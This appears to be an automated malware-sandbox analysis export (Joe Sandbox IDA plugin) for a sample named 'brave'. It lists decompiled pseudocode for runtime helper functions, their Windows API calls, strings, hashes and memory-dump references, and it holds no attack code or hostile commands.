Part of subcall function 00007FF6A6029850: strlen.MSVCRT ref: 00007FF6A602987B

Part of subcall function 00007FF6A602A970: strlen.MSVCRT ref: 00007FF6A602A99B

Part of subcall function 00007FF6A602AAF0: strlen.MSVCRT ref: 00007FF6A602AB1B

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction ID: 7ac0889ea62ad915cb236b28f79e675bbefb5727c776668d27cea5e3108bfd04
Opcode Fuzzy Hash: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction Fuzzy Hash: EB617520E0B64680E914AF22BE553B66361FF5AFC9F401831ED8D9B397DE7ED0958344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6032530 Relevance: 1.4, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF67FF6A6032530() {
				long long _v184;
				void* _t39;
				void* _t41;
				void* _t42;
				int _t44;
				long long* _t53;
				void* _t54;
				void* _t55;
				void* _t92;
				int _t93;
				int _t94;
				int _t95;

				E00007FF67FF6A60319A0(_t41, _t42, _t44, _t55);
				_t93 = _t44;
				E00007FF67FF6A602A7A0(_t44, _t55);
				E00007FF67FF6A6032160(0x10, _t39, _t44, _t54, _t93, 0xa62b6c10, 0x7ff6a602a8d0, _t92, _t93, _t55);
				_t98 = _t44;
				E00007FF67FF6A6031CF0(_t93);
				E00007FF67FF6A600FEC0();
				_push(_t44);
				_push(_t93);
				E00007FF67FF6A60319A0(_t41, _t42, _t44, _t98);
				_t94 = _t44;
				E00007FF67FF6A6029850(_t44, _t98);
				E00007FF67FF6A6032160(0x10, _t39, _t44, _t54, _t94, 0xa62b6b70, 0x7ff6a6029970, _t92, _t94, _t98);
				_t100 = _t44;
				E00007FF67FF6A6031CF0(_t94);
				E00007FF67FF6A600FEC0();
				_push(_t44);
				_push(_t94);
				E00007FF67FF6A60319A0(_t41, _t42, _t44, _t100);
				_t95 = _t44;
				E00007FF67FF6A602A970(_t44, _t100);
				E00007FF67FF6A6032160(0x10, _t39, _t44, _t54, _t95, 0xa62b6c30, 0x7ff6a602aa90, _t92, _t95, _t100);
				_t102 = _t44;
				E00007FF67FF6A6031CF0(_t95);
				E00007FF67FF6A600FEC0();
				_push(_t44);
				E00007FF67FF6A60319A0(_t41, _t42, _t44, _t102);
				_t96 = _t44;
				E00007FF67FF6A602AAF0(_t44, _t102);
				E00007FF67FF6A6032160(0x10, _t39, _t44, _t54, _t44, 0xa62b6c50, 0x7ff6a602ac10, _t92, _t44, _t102);
				E00007FF67FF6A6031CF0(_t96);
				E00007FF67FF6A600FEC0();
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				_t53 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF6A6010980(0xa62b2d20, 0xa62b6c50);
				 *0xa62b2d38 = 0x12400; // executed
				malloc(_t95); // executed
				 *0xa62b2d30 = _t53;
				if (_t53 == 0) goto 0xa6032789;
				 *0xa62b2d28 = _t53;
				 *_t53 = 0x12400;
				 *((long long*)(_t53 + 8)) = 0;
				goto E00007FF67FF6A6001520;
				 *0xa62b2d38 = 0;
				 *0xa62b2d28 = 0;
				goto 0xa6032779;
				0;
				0;
				0;
			}

0x7ff6a6032540
0x7ff6a603254b
0x7ff6a603254e
0x7ff6a6032564
0x7ff6a6032569
0x7ff6a603256f
0x7ff6a6032577
0x7ff6a6032580
0x7ff6a6032582
0x7ff6a6032590
0x7ff6a603259b
0x7ff6a603259e
0x7ff6a60325b4
0x7ff6a60325b9
0x7ff6a60325bf
0x7ff6a60325c7
0x7ff6a60325d0
0x7ff6a60325d2
0x7ff6a60325e0
0x7ff6a60325eb
0x7ff6a60325ee
0x7ff6a6032604
0x7ff6a6032609
0x7ff6a603260f
0x7ff6a6032617
0x7ff6a6032620
0x7ff6a6032630
0x7ff6a603263b
0x7ff6a603263e
0x7ff6a6032654
0x7ff6a603265f
0x7ff6a6032667
0x7ff6a6032670
0x7ff6a6032681
0x7ff6a6032683
0x7ff6a6032694
0x7ff6a6032696
0x7ff6a60326a7
0x7ff6a60326a9
0x7ff6a60326ba
0x7ff6a60326bc
0x7ff6a60326c7
0x7ff6a60326c9
0x7ff6a60326da
0x7ff6a60326dc
0x7ff6a60326ed
0x7ff6a60326ef
0x7ff6a6032700
0x7ff6a6032702
0x7ff6a6032713
0x7ff6a6032715
0x7ff6a603271e
0x7ff6a6032726
0x7ff6a603272e
0x7ff6a603273d
0x7ff6a6032747
0x7ff6a6032752
0x7ff6a6032757
0x7ff6a6032761
0x7ff6a6032763
0x7ff6a603276a
0x7ff6a6032771
0x7ff6a6032784
0x7ff6a6032789
0x7ff6a6032794
0x7ff6a603279f
0x7ff6a60327a7
0x7ff6a60327ab
0x7ff6a60327af

APIs

Part of subcall function 00007FF6A60319A0: malloc.MSVCRT(?,?,?,?,00007FF6A60323B5,?,?,?,?,00007FF6A6003C24), ref: 00007FF6A60319B1

Part of subcall function 00007FF6A602A7A0: strlen.MSVCRT ref: 00007FF6A602A7CB

Part of subcall function 00007FF6A600FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF6A600FF45
Part of subcall function 00007FF6A600FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF6A600FF63
Part of subcall function 00007FF6A600FEC0: abort.MSVCRT ref: 00007FF6A600FF69

Part of subcall function 00007FF6A6029850: strlen.MSVCRT ref: 00007FF6A602987B

Part of subcall function 00007FF6A602A970: strlen.MSVCRT ref: 00007FF6A602A99B

Part of subcall function 00007FF6A602AAF0: strlen.MSVCRT ref: 00007FF6A602AB1B

malloc.MSVCRT ref: 00007FF6A6032752

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction ID: 04805c8b4a23d9913b36441bea7fba6cce57d47610ffe1d83290ec5ca3605770
Opcode Fuzzy Hash: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction Fuzzy Hash: E4518121A0B64680FA14AF26FE553B67360FF99F89F401835EE8D87396CE7ED0948344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6017060 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6A6017068
CreateMutexA.KERNEL32 ref: 00007FF6A6017177
WaitForSingleObject.KERNEL32 ref: 00007FF6A6017188
FindAtomA.KERNEL32 ref: 00007FF6A601719D
AddAtomA.KERNEL32 ref: 00007FF6A60171DD
_onexit.MSVCRT ref: 00007FF6A60171FA
ReleaseMutex.KERNEL32 ref: 00007FF6A6017202
CloseHandle.KERNEL32 ref: 00007FF6A601720B

Strings

__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa, xrefs: 00007FF6A60170DB, 00007FF6A6017196, 00007FF6A60171D6, 00007FF6A6017227
failed to to lock creation mutex, xrefs: 00007FF6A60172D6
failed to add string to atom table, xrefs: 00007FF6A60172C3
NiBhAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF6A601706E, 00007FF6A601712F
aaaaaaaa, xrefs: 00007FF6A601711E
__shmem3_winpthreads_tdm_, xrefs: 00007FF6A60170B7, 00007FF6A60170E7
aaaaaaaa, xrefs: 00007FF6A6017114
failed to get string from atom, xrefs: 00007FF6A60172F6

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: NiBhAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-3808810414
Opcode ID: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction ID: 2b49e627bd9f8fde10bbd4b9f152048faa36182940ef6ae134c1e19e0316839e
Opcode Fuzzy Hash: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction Fuzzy Hash: A8616E75A0BA4381EB168B14EA062B927A1BF54F8AF844035D90FC7399EE7EF955C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6013520 Relevance: 24.4, APIs: 16, Instructions: 450
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6013520(void* __edx, void* __r8) {

				if (__edx != 0) goto 0xa6013548;
				if (__r8 == 0) goto 0xa6013588;
				return 1;
			}

0x7ff6a601352d
0x7ff6a6013532
0x7ff6a6013544

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF6A6013594
TlsGetValue.KERNEL32 ref: 00007FF6A60135ED
CloseHandle.KERNEL32 ref: 00007FF6A601362B
CloseHandle.KERNEL32 ref: 00007FF6A6013638
TlsSetValue.KERNEL32 ref: 00007FF6A60136A5

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
String ID:
API String ID: 2941551293-0
Opcode ID: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction ID: bafe6cac34c394e88fa28e380b2228d7986ad32618091a1d179d673f73159051
Opcode Fuzzy Hash: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction Fuzzy Hash: F8222721A0BB0A85FB69AB15D69437927A0FF44F98F444536DA1D833D5DF3EE4A4C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6016F70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF6A6016F81
WaitForSingleObject.KERNEL32 ref: 00007FF6A6016F92
FindAtomA.KERNEL32 ref: 00007FF6A6016FFF
ReleaseMutex.KERNEL32 ref: 00007FF6A601700D
CloseHandle.KERNEL32 ref: 00007FF6A6017016
CloseHandle.KERNEL32 ref: 00007FF6A6017037

Strings

failed to to lock cleanup mutex, xrefs: 00007FF6A6017028
__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa, xrefs: 00007FF6A6016FF8
NiBhAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF6A6016F7A

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: NiBhAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa$failed to to lock cleanup mutex
API String ID: 3776795807-2687269923
Opcode ID: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction ID: 16a20199713d3cfb4aa7146092a96760fbf5bfebca201ace8e8e5558117ef3bc
Opcode Fuzzy Hash: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction Fuzzy Hash: 4D218161A0BA0381EF559B51EA5513822A1BF44FCAB849535C91FC7394EE3FF8D5C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6012D40 Relevance: 16.7, APIs: 11, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00007FF67FF6A6012D40(void* __ecx, void* __rdx) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				intOrPtr _t18;
				intOrPtr _t19;
				void* _t22;
				void* _t26;
				intOrPtr* _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t27 =  *0xa62b6920; // 0x7ff6a62c1400
				_t18 =  *_t27;
				if (_t18 == 0) goto 0xa6012f30;
				if ( *((long long*)(_t18 + 0x28)) != 0) goto 0xa6012f18;
				 *((long long*)(_t18 + 0x28)) = 0xa62c13c8;
				if ( *0xa62c13c8 == 1) goto 0xa6012f25;
				E00007FF67FF6A6012350(_t9, _t10, _t11,  *0xa62c13c8 - 1, _t18, _t22, 0xa62c13c8, _t26, _t27, _t28, _t30, _t31, _t32);
				_t19 =  *_t27;
				if (_t19 == 0) goto 0xa6012dc0;
				if ( *((long long*)(_t19 + 0x30)) != 0) goto 0xa6012de0;
				 *((long long*)(_t19 + 0x30)) = 0xa62b2bd8;
				_t6 = TlsGetValue(??);
				if (0xa62b2bd8 == 0) goto 0xa6012df4;
				return _t6;
			}

0x7ff6a6012d4a
0x7ff6a6012d51
0x7ff6a6012d57
0x7ff6a6012d62
0x7ff6a6012d72
0x7ff6a6012d76
0x7ff6a6012d7c
0x7ff6a6012d81
0x7ff6a6012d87
0x7ff6a6012d8e
0x7ff6a6012d97
0x7ff6a6012da0
0x7ff6a6012dac
0x7ff6a6012dbb

APIs

TlsGetValue.KERNEL32 ref: 00007FF6A6012DA0

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction ID: 28d0be3fafc7ce028b6f557f129f3810e2d933cedf84d45a6fa56050c687873a
Opcode Fuzzy Hash: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction Fuzzy Hash: BE710732A0BB0689EB619F25E65436936A0FF44F98F444239DA5D87395EF3EE4D4C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6004090 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6A60040C1
wcslen.MSVCRT ref: 00007FF6A6004117

Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DF96
Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DFC1

wcslen.MSVCRT ref: 00007FF6A60041B7
memcpy.MSVCRT ref: 00007FF6A60042E6

Strings

\??\, xrefs: 00007FF6A6004110, 00007FF6A6004129
, xrefs: 00007FF6A60041CE
basic_string::_M_construct null not valid, xrefs: 00007FF6A6004300
0, xrefs: 00007FF6A6004260
@, xrefs: 00007FF6A600426B

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpywcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2971582370
Opcode ID: 0a95272e9e1fbf78605ef02e129974c233ea37299847b336bd54345235c1d157
Instruction ID: e234cee1640e1adcb829b5eb5e08fe2112d8c3648709dfcf840e3aa0b795e9fd
Opcode Fuzzy Hash: 0a95272e9e1fbf78605ef02e129974c233ea37299847b336bd54345235c1d157
Instruction Fuzzy Hash: 7661253260EBC185E7708F15F5503AAB7A0FB88B84F454225DA9C87B99DF7EC098CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6010230 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF67FF6A6010230(intOrPtr* __rax, void* __rcx) {
				void* _t5;
				intOrPtr _t6;
				intOrPtr* _t11;
				intOrPtr _t13;

				_t11 = __rax;
				_t13 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t13 == 0) goto 0xa6010288;
				_t6 =  *0xa62c1370; // 0x1
				_t5 = E00007FF67FF6A6015260(_t6, __rax);
				if (_t11 == 0) goto 0xa60102c8;
				if ( *_t11 - _t13 < 0) goto 0xa6010370;
				if ( *((intOrPtr*)(_t11 + 8 + (_t13 - 1) * 8)) == 0) goto 0xa6010310;
				return _t5;
			}

0x7ff6a6010230
0x7ff6a601023a
0x7ff6a6010244
0x7ff6a6010246
0x7ff6a601024c
0x7ff6a6010257
0x7ff6a601025f
0x7ff6a6010271
0x7ff6a6010284

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction ID: 4f08589448b405638e0ff737afced8561588f143dab2878c8c5d3a35828f975e
Opcode Fuzzy Hash: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction Fuzzy Hash: 7151D772A0BA0681EB119F10D6445F823A4FF54F88F588435EE5E87391DE3EF8A1C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60039D0 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6A6003A58

Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DF96
Part of subcall function 00007FF6A602DEF0: memcpy.MSVCRT ref: 00007FF6A602DFC1

wcslen.MSVCRT ref: 00007FF6A6003AE6
memcpy.MSVCRT ref: 00007FF6A6003BFE

Strings

, xrefs: 00007FF6A6003AEB
\??\, xrefs: 00007FF6A6003A51, 00007FF6A6003A6A
basic_string::_M_construct null not valid, xrefs: 00007FF6A6003C18
@, xrefs: 00007FF6A6003B55
0, xrefs: 00007FF6A6003B4A

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

